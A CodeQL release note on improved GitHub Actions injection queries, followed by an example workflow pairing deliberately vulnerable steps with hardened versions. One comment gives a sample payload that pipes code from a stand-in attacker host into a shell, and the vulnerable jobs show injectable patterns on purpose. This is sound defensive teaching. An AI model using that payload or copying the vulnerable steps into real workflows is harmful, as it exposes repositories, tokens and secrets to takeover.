codeql/javascript/ql/lib/change-notes/released/0.6.2.md
2023-05-22 20:47:00 +00:00


0.6.2

Minor Analysis Improvements

  • Improved the queries for injection vulnerabilities in GitHub Actions workflows (js/actions/command-injection and js/actions/pull-request-target) and the associated library semmle.javascript.Actions. The queries now model steps defined in composite actions in addition to steps defined in workflow files, and they recognize more potentially untrusted input values. Besides shell injection in run: steps, they now also detect injection into actions/github-script scripts, as well as simple injections through user-controlled ${{ env.name }} values. Workflow files with the .yaml extension are now supported in addition to .yml.
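As an added example (not code from the CodeQL repository or from the change note above): a workflow and a composite action that contain the patterns the improved queries look for, with each vulnerable step beside a hardened form. The workflow name, job names, the composite action path, and the payload quoted in the comments are hypothetical; the contexts used (github.event.pull_request.title, github.head_ref, env.TITLE) are real GitHub Actions expression contexts.

```yaml
# Added example, not from the CodeQL repository. Workflow name, job names and
# the composite action path below are hypothetical.
name: triage
on:
  pull_request_target:          # runs in the base repo with a write token and secrets
    types: [opened, edited]

jobs:
  vulnerable:
    runs-on: ubuntu-latest
    env:
      TITLE: ${{ github.event.pull_request.title }}
    steps:
      # 1. Shell injection: the expression is substituted into the script text
      #    before bash parses it, so a title such as
      #    "; curl http://attacker.example/x | sh; echo " runs as a command.
      - run: echo "PR title: ${{ github.event.pull_request.title }}"

      # 2. Same bug through env: ${{ env.TITLE }} is still substituted into the
      #    script text, so routing the value through env changes nothing here.
      - run: echo "PR title: ${{ env.TITLE }}"

      # 3. actions/github-script: the expression lands inside a JavaScript
      #    string literal, so the injection is into JavaScript, not the shell.
      - uses: actions/github-script@v6
        with:
          script: |
            const title = "${{ github.event.pull_request.title }}";
            core.info(`Title: ${title}`);

      # 4. pull_request_target plus a checkout of the PR head: the build step
      #    then executes attacker-controlled code with the base repo's token.
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm install && npm test

  hardened:
    runs-on: ubuntu-latest
    env:
      # Expanded into a process environment variable, not into script text.
      TITLE: ${{ github.event.pull_request.title }}
    steps:
      # 1/2. Read the value from the environment inside the shell; bash treats
      #      $TITLE as data, and the double quotes keep it a single word.
      - run: echo "PR title: $TITLE"

      # 3. In github-script, take the value from the event payload (or from
      #    process.env) instead of interpolating an expression into the source.
      - uses: actions/github-script@v6
        with:
          script: |
            const title = context.payload.pull_request.title;
            core.info(`Title: ${title}`);

      # 4. Under pull_request_target, do not check out and run the PR head.
      #    Without `ref`, checkout uses the base branch commit the event
      #    carries; run untrusted PR code only from a pull_request-triggered
      #    workflow, where the token is read-only and secrets are withheld.
      - uses: actions/checkout@v3

---
# Composite action (hypothetical path: .github/actions/greet/action.yml).
# The queries now model these steps as well; the github context is the
# same untrusted data here as in a workflow file.
name: greet
runs:
  using: composite
  steps:
    # Injection: the PR head branch name is attacker-controlled and is
    # substituted into the script text.
    - run: echo "branch: ${{ github.head_ref }}"
      shell: bash
    # Hardened: pass it through the environment and read it as a variable.
    - run: echo "branch: $HEAD_REF"
      shell: bash
      env:
        HEAD_REF: ${{ github.head_ref }}
```

The rule of thumb the two jobs illustrate: any `${{ ... }}` expression written inside `run:` or inside a github-script `script:` is substituted as text before the interpreter sees it, so it must never carry data an external contributor can choose; bind that data to `env:` and reference it as a shell or process variable instead.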